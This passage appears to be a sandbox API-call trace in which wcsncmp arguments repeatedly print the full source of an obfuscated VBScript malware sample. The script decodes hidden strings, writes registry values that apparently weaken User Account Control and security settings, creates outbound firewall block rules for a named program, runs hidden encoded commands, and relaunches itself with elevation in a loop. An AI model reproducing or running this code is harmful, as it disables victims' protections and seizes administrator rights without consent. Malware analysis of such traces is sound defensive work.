newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0222.929] wcsncmp (_String1=" \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.929] wcsncmp (_String1="\"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 21 [0222.929] wcsncmp (_String1="chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86 [0222.929] wcsncmp (_String1="have\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite 